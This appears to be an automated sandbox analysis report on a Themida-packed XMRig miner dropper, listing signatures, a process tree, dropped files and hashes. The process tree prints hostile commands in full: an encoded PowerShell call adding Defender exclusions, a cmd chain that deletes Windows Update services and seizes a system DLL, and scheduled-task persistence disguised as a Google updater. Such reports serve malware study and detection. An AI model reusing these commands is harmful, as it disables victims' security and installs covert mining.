Analysis

  • max time kernel
    301s
  • max time network
    293s
  • platform
    windows7_x64
  • resource
    win7-20220715-en
  • resource tags

    arch:x64arch:x86image:win7-20220715-enlocale:en-usos:windows7-x64system
  • submitted
    16-07-2022 22:15

General

  • Target

    fb000db227c1df1a5566aeb4029d98ed934a0a10b1b659d402f64d921f321462.exe

  • Size

    7.4MB

  • MD5

    40f9273f06567da762a787c34937dc08

  • SHA1

    2e811bb5047a0e7c07c48e037a540f30c301b0ab

  • SHA256

    fb000db227c1df1a5566aeb4029d98ed934a0a10b1b659d402f64d921f321462

  • SHA512

    f3c0e58f4a2e11482f00f0c3bb583dce48eda4f04dfd118323a2b3e2c44999d891cbc4474203046f262b39bca05ade0e58231dcbcfe1df589f9b4875a4804dfd

Malware Config

Signatures

  • Modifies security service 2 TTPs 2 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
  • XMRig Miner payload 13 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Possible privilege escalation attempt 4 IoCs
  • Stops running service(s) 3 TTPs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Themida packer 12 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies Internet Explorer settings 1 TTPs 46 IoCs
  • Modifies data under HKEY_USERS 5 IoCs
  • Modifies registry key 1 TTPs 18 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 15 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\fb000db227c1df1a5566aeb4029d98ed934a0a10b1b659d402f64d921f321462.exe
    "C:\Users\Admin\AppData\Local\Temp\fb000db227c1df1a5566aeb4029d98ed934a0a10b1b659d402f64d921f321462.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1456
    • C:\Windows\Temp\setup.exe
      "C:\Windows\Temp\setup.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Executes dropped EXE
      • Checks BIOS information in registry
      • Checks whether UAC is enabled
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of WriteProcessMemory
      PID:1928
      • C:\Windows\System32\conhost.exe
        "C:\Windows\System32\conhost.exe" "C:\Windows\Temp\setup.exe"
        3⤵
        • Drops file in Drivers directory
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1184
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AZQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAZABmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHMAbwBxAHgAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbQBvAGMAdwAjAD4A"
          4⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2016
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1460
          • C:\Windows\system32\sc.exe
            sc stop UsoSvc
            5⤵
            • Launches sc.exe
            PID:1200
          • C:\Windows\system32\sc.exe
            sc stop WaaSMedicSvc
            5⤵
            • Launches sc.exe
            PID:108
          • C:\Windows\system32\sc.exe
            sc stop wuauserv
            5⤵
            • Launches sc.exe
            PID:1972
          • C:\Windows\system32\sc.exe
            sc stop bits
            5⤵
            • Launches sc.exe
            PID:1940
          • C:\Windows\system32\sc.exe
            sc stop dosvc
            5⤵
            • Launches sc.exe
            PID:1628
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
            5⤵
            • Modifies registry key
            PID:1912
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
            5⤵
            • Modifies registry key
            PID:1372
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
            5⤵
            • Modifies security service
            • Modifies registry key
            PID:2004
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
            5⤵
            • Modifies registry key
            PID:1096
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
            5⤵
            • Modifies registry key
            PID:1076
          • C:\Windows\system32\takeown.exe
            takeown /f C:\Windows\System32\WaaSMedicSvc.dll
            5⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            • Suspicious use of AdjustPrivilegeToken
            PID:1368
          • C:\Windows\system32\icacls.exe
            icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
            5⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:112
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:1332
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:1724
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:1324
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:1188
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
            5⤵
              PID:2000
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
              5⤵
                PID:1344
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                5⤵
                  PID:1572
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                  5⤵
                    PID:1276
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                    5⤵
                      PID:1152
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                      5⤵
                        PID:1772
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                        5⤵
                          PID:772
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                        4⤵
                        • Suspicious use of WriteProcessMemory
                        PID:464
                        • C:\Windows\system32\powercfg.exe
                          powercfg /x -hibernate-timeout-ac 0
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:968
                        • C:\Windows\system32\powercfg.exe
                          powercfg /x -hibernate-timeout-dc 0
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1992
                        • C:\Windows\system32\powercfg.exe
                          powercfg /x -standby-timeout-ac 0
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1528
                        • C:\Windows\system32\powercfg.exe
                          powercfg /x -standby-timeout-dc 0
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2000
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""
                        4⤵
                          PID:1736
                          • C:\Windows\system32\schtasks.exe
                            schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""
                            5⤵
                            • Creates scheduled task(s)
                            PID:1748
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
                          4⤵
                            PID:860
                            • C:\Windows\system32\schtasks.exe
                              schtasks /run /tn "GoogleUpdateTaskMachineQC"
                              5⤵
                                PID:1200
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c ""C:\Windows\Temp\run.bat" "
                          2⤵
                          • Drops startup file
                          PID:984
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c ""C:\Windows\Temp\lol.bat" "
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:1384
                          • C:\Program Files\Internet Explorer\iexplore.exe
                            "C:\Program Files\Internet Explorer\iexplore.exe" https://take-realprize.life/?u=lq1pd08&o=hdck0gl
                            3⤵
                            • Modifies Internet Explorer settings
                            • Suspicious use of FindShellTrayWindow
                            • Suspicious use of SetWindowsHookEx
                            • Suspicious use of WriteProcessMemory
                            PID:1924
                            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1924 CREDAT:275457 /prefetch:2
                              4⤵
                              • Modifies Internet Explorer settings
                              • Suspicious use of SetWindowsHookEx
                              PID:1248
                      • C:\Windows\system32\taskeng.exe
                        taskeng.exe {ED0F29DC-E91D-4CBE-AE5C-ADD2223B83EC} S-1-5-18:NT AUTHORITY\System:Service:
                        1⤵
                        • Loads dropped DLL
                        PID:1972
                        • C:\Program Files\Google\Chrome\updater.exe
                          "C:\Program Files\Google\Chrome\updater.exe"
                          2⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Executes dropped EXE
                          • Checks BIOS information in registry
                          • Checks whether UAC is enabled
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          PID:1956
                          • C:\Windows\System32\conhost.exe
                            "C:\Windows\System32\conhost.exe" "C:\Program Files\Google\Chrome\updater.exe"
                            3⤵
                            • Drops file in Drivers directory
                            • Suspicious use of SetThreadContext
                            • Drops file in Program Files directory
                            • Modifies data under HKEY_USERS
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:880
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AZQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAZABmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHMAbwBxAHgAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbQBvAGMAdwAjAD4A"
                              4⤵
                              • Drops file in System32 directory
                              • Modifies data under HKEY_USERS
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1852
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                              4⤵
                                PID:680
                                • C:\Windows\system32\sc.exe
                                  sc stop UsoSvc
                                  5⤵
                                  • Launches sc.exe
                                  PID:860
                                • C:\Windows\system32\sc.exe
                                  sc stop WaaSMedicSvc
                                  5⤵
                                  • Launches sc.exe
                                  PID:632
                                • C:\Windows\system32\sc.exe
                                  sc stop wuauserv
                                  5⤵
                                  • Launches sc.exe
                                  PID:1816
                                • C:\Windows\system32\sc.exe
                                  sc stop bits
                                  5⤵
                                  • Launches sc.exe
                                  PID:1096
                                • C:\Windows\system32\sc.exe
                                  sc stop dosvc
                                  5⤵
                                  • Launches sc.exe
                                  PID:1208
                                • C:\Windows\system32\reg.exe
                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                                  5⤵
                                  • Modifies registry key
                                  PID:1684
                                • C:\Windows\system32\reg.exe
                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                                  5⤵
                                  • Modifies registry key
                                  PID:984
                                • C:\Windows\system32\reg.exe
                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                                  5⤵
                                  • Modifies registry key
                                  PID:2000
                                • C:\Windows\system32\reg.exe
                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                                  5⤵
                                  • Modifies registry key
                                  PID:2020
                                • C:\Windows\system32\reg.exe
                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                                  5⤵
                                  • Modifies registry key
                                  PID:1460
                                • C:\Windows\system32\takeown.exe
                                  takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                  5⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1956
                                • C:\Windows\system32\icacls.exe
                                  icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                                  5⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  PID:932
                                • C:\Windows\system32\reg.exe
                                  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                                  5⤵
                                  • Modifies registry key
                                  PID:1912
                                • C:\Windows\system32\reg.exe
                                  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                                  5⤵
                                  • Modifies registry key
                                  PID:1772
                                • C:\Windows\system32\reg.exe
                                  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                                  5⤵
                                  • Modifies registry key
                                  PID:1460
                                • C:\Windows\system32\reg.exe
                                  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                                  5⤵
                                  • Modifies registry key
                                  PID:112
                                • C:\Windows\system32\schtasks.exe
                                  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
                                  5⤵
                                    PID:1332
                                  • C:\Windows\system32\schtasks.exe
                                    SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                                    5⤵
                                      PID:1772
                                    • C:\Windows\system32\schtasks.exe
                                      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                                      5⤵
                                        PID:1912
                                      • C:\Windows\system32\schtasks.exe
                                        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                                        5⤵
                                          PID:292
                                        • C:\Windows\system32\schtasks.exe
                                          SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                                          5⤵
                                            PID:108
                                          • C:\Windows\system32\schtasks.exe
                                            SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                                            5⤵
                                              PID:1772
                                            • C:\Windows\system32\schtasks.exe
                                              SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                              5⤵
                                                PID:2000
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                              4⤵
                                                PID:1748
                                                • C:\Windows\system32\powercfg.exe
                                                  powercfg /x -hibernate-timeout-ac 0
                                                  5⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:924
                                                • C:\Windows\system32\powercfg.exe
                                                  powercfg /x -hibernate-timeout-dc 0
                                                  5⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:1352
                                                • C:\Windows\system32\powercfg.exe
                                                  powercfg /x -standby-timeout-ac 0
                                                  5⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:1628
                                                • C:\Windows\system32\powercfg.exe
                                                  powercfg /x -standby-timeout-dc 0
                                                  5⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2016
                                              • C:\Windows\System32\conhost.exe
                                                C:\Windows\System32\conhost.exe "yhxnbfvc"
                                                4⤵
                                                  PID:1640
                                                • C:\Windows\explorer.exe
                                                  C:\Windows\explorer.exe vjvqraunhphpcxx1 GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqN5dCL6SdfpGQxdbsBsqueaxRnQzTx2Bqmg+8Hm/cXMESqb4c3Os26fGj23Hqsnl0qmcpNr8N8RD0Uj65Is/XzsC3UFIPpYz7Zp9mKjXqYW+xHlpEMJ8pitovpD3AlrEcYhafjTHJIBsyQCmYqS8DwlNaC3+8ctTQ5gWGWPwhQ4m7w5ntgK8u6m/StfnNPDdr+VwS4s25pICn3Q/Dq0WEk/j+SBlrEi93dXqUBShtLfUbnT4w5YQhLxDVbXc7xoFDIPd01rv+1vwAaan4sl2k1YkrvCpkMy2cu5BYO8sYd8sc8dLcQPq/swWuhKRRVQuprYmKwuUqhwRP67Zf25Cl8Tp0/SG7shKeBfov0SpkJ+htBtlrCxwKrT2FTk8hoaLe
                                                  4⤵
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:1828

                                          Network

                                          MITRE ATT&CK Enterprise v6

                                          Replay Monitor

                                          Loading Replay Monitor...

                                          Downloads

                                          • C:\Program Files\Google\Chrome\updater.exe
                                            Filesize

                                            7.1MB

                                            MD5

                                            0472d36671fd6602ad4b1a6290f650d3

                                            SHA1

                                            12a95224d186a6ae001ef3f2cc80c737c35182a1

                                            SHA256

                                            7198d9e1f109cf66a7612e005333a1a8043833927a449b01931826b825243660

                                            SHA512

                                            30d9f7f81489b5d0f0ffee122c4a9c9736a12b3a878d5ce54c758e17e7c15c464b9202d4fb9556a7211a943ae48fd9d1a18f8c3cd79d813d474a5ecf7f2558d2

                                          • C:\Program Files\Google\Chrome\updater.exe
                                            Filesize

                                            7.1MB

                                            MD5

                                            0472d36671fd6602ad4b1a6290f650d3

                                            SHA1

                                            12a95224d186a6ae001ef3f2cc80c737c35182a1

                                            SHA256

                                            7198d9e1f109cf66a7612e005333a1a8043833927a449b01931826b825243660

                                            SHA512

                                            30d9f7f81489b5d0f0ffee122c4a9c9736a12b3a878d5ce54c758e17e7c15c464b9202d4fb9556a7211a943ae48fd9d1a18f8c3cd79d813d474a5ecf7f2558d2

                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                            Filesize

                                            340B

                                            MD5

                                            10e55493ead15e9b2fafba3324127f69

                                            SHA1

                                            56718f81c12ebeb0cde473b230277021b3b601d9

                                            SHA256

                                            67b73f5e08f45ccbf6546aef0dea94f05505e672c2a5ee3a2662e3bbd43058e1

                                            SHA512

                                            c9e46052ee2c76f9d900b8f5a078462f51d458652930f94c1b79b05c272983dd841e36e694089068ac7e659a1424ca011cbe0d34de2a59b06c28b42f652f367b

                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\CCGNLYSA.txt
                                            Filesize

                                            606B

                                            MD5

                                            5aec3f0ac2934e5efd066ee893c27fa8

                                            SHA1

                                            964edd03f5cc3280da31901eaa2edbf39c6625a5

                                            SHA256

                                            959263040221f9132dd6fb8b6374b2051ac91f1f6bacc16c9d4b275a6bc70764

                                            SHA512

                                            d1920fb504eca53d4aa21c116d3ff0c24e9dfd94fa68bb10d89f4b5d7cd8579b0e7266e2bf01e83d22c62f9a32a537776a21112b7a7973809d580259b81e8f5d

                                          • C:\Windows\Temp\lol.bat
                                            Filesize

                                            59B

                                            MD5

                                            f580e0e80cc87b25e38ea2c0c8059d04

                                            SHA1

                                            299f51dca9c609d6da86f93c424e39c1e6ba0d94

                                            SHA256

                                            9e7b9ed63bd5dfe290fda58104cd98e8d23ba671d3ccb77e82e8b0f7812fb734

                                            SHA512

                                            5a0a1e4d3800ee76fc4d1d102ffe7e0d4e646c08f57f20c019741c3779ca85dc8a1240c77c90b0caef498859de960e71be3a81497b5ffac8b381aa2c7813e83d

                                          • C:\Windows\Temp\run.bat
                                            Filesize

                                            98B

                                            MD5

                                            731afe244b2414169a5f630d52646e56

                                            SHA1

                                            e3771ccdccd8c306ee5fc4f264cfc3310690458c

                                            SHA256

                                            6c24e5b6a9aaced68f9f93581913bdea4cc1077060827d5d59d6680859e4e552

                                            SHA512

                                            84e0dc44ae3eadf6d31484119294126f5a056add94733fea2ba5597b6a302fc107117f5c5029d4ce0ff8e5c859c4de9c456aa5f01d420f25a3d56dc569801ff1

                                          • C:\Windows\Temp\setup.exe
                                            Filesize

                                            7.1MB

                                            MD5

                                            0472d36671fd6602ad4b1a6290f650d3

                                            SHA1

                                            12a95224d186a6ae001ef3f2cc80c737c35182a1

                                            SHA256

                                            7198d9e1f109cf66a7612e005333a1a8043833927a449b01931826b825243660

                                            SHA512

                                            30d9f7f81489b5d0f0ffee122c4a9c9736a12b3a878d5ce54c758e17e7c15c464b9202d4fb9556a7211a943ae48fd9d1a18f8c3cd79d813d474a5ecf7f2558d2

                                          • C:\Windows\Temp\setup.exe
                                            Filesize

                                            7.1MB

                                            MD5

                                            0472d36671fd6602ad4b1a6290f650d3

                                            SHA1

                                            12a95224d186a6ae001ef3f2cc80c737c35182a1

                                            SHA256

                                            7198d9e1f109cf66a7612e005333a1a8043833927a449b01931826b825243660

                                            SHA512

                                            30d9f7f81489b5d0f0ffee122c4a9c9736a12b3a878d5ce54c758e17e7c15c464b9202d4fb9556a7211a943ae48fd9d1a18f8c3cd79d813d474a5ecf7f2558d2

                                          • C:\Windows\system32\drivers\etc\hosts
                                            Filesize

                                            2KB

                                            MD5

                                            c5227366b7a688ff23b01788718251aa

                                            SHA1

                                            9795262e79c832ba49c744fcd1b1794c0ffb5c6a

                                            SHA256

                                            789abfd744b03d07fac02be7177c535989ea9e92b9db32fb1360cdfd083a1f48

                                            SHA512

                                            8b9560fa2265f74aec7bb7b96e5a7dba789edc4166e58af9994a1ee95fa42b22a7539be804f4fcf3d5a9e657be020087a343b030fee6aaddbb67b1134810cfbe

                                          • \Program Files\Google\Chrome\updater.exe
                                            Filesize

                                            7.1MB

                                            MD5

                                            0472d36671fd6602ad4b1a6290f650d3

                                            SHA1

                                            12a95224d186a6ae001ef3f2cc80c737c35182a1

                                            SHA256

                                            7198d9e1f109cf66a7612e005333a1a8043833927a449b01931826b825243660

                                            SHA512

                                            30d9f7f81489b5d0f0ffee122c4a9c9736a12b3a878d5ce54c758e17e7c15c464b9202d4fb9556a7211a943ae48fd9d1a18f8c3cd79d813d474a5ecf7f2558d2

                                          • \Windows\Temp\setup.exe
                                            Filesize

                                            7.1MB

                                            MD5

                                            0472d36671fd6602ad4b1a6290f650d3

                                            SHA1

                                            12a95224d186a6ae001ef3f2cc80c737c35182a1

                                            SHA256

                                            7198d9e1f109cf66a7612e005333a1a8043833927a449b01931826b825243660

                                            SHA512

                                            30d9f7f81489b5d0f0ffee122c4a9c9736a12b3a878d5ce54c758e17e7c15c464b9202d4fb9556a7211a943ae48fd9d1a18f8c3cd79d813d474a5ecf7f2558d2

                                          • memory/108-82-0x0000000000000000-mapping.dmp
                                          • memory/112-150-0x0000000000000000-mapping.dmp
                                          • memory/112-95-0x0000000000000000-mapping.dmp
                                          • memory/464-79-0x0000000000000000-mapping.dmp
                                          • memory/632-134-0x0000000000000000-mapping.dmp
                                          • memory/680-129-0x0000000000000000-mapping.dmp
